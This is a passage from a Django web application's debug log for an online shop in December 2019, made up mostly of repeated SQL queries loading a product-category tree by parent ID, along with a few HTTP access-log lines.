"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:39:57,296 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:39:57,301 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:39:57,305 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:39:57,310 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:39:57,313 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:39:57,316 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:39:57,319 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:39:57,323 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:39:57,330 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:39:57,334 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:39:57,337 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:39:57,341 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:39:57,345 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:39:57,350 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:39:57,353 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:39:57,357 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:39:57,360 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:39:57,364 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:39:57,369 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:39:57,372 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:39:57,375 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:39:57,378 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:39:57,380 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:39:57,383 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:39:57,387 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:39:57,390 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:39:57,392 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:39:57,395 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:39:57,398 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:39:57,402 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:39:57,404 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:39:57,407 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:39:57,410 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:39:57,412 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:39:57,416 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:39:57,419 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:39:57,422 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:39:57,424 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:39:57,427 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:39:57,429 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:39:57,433 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:39:57,435 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:39:57,438 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:39:57,441 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:39:57,443 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:39:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:42:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 13:43:27,946 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:43:27,957 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:43:27,961 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:43:27,963 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:43:27,967 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:43:27,969 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:43:27,971 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:43:27,974 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:43:27,976 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:43:27,982 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:43:27,985 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:43:27,987 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:43:27,989 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:43:27,992 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:43:27,996 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:43:28,000 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:43:28,003 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:43:28,006 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:43:28,008 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:43:28,015 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:43:28,019 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:43:28,024 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 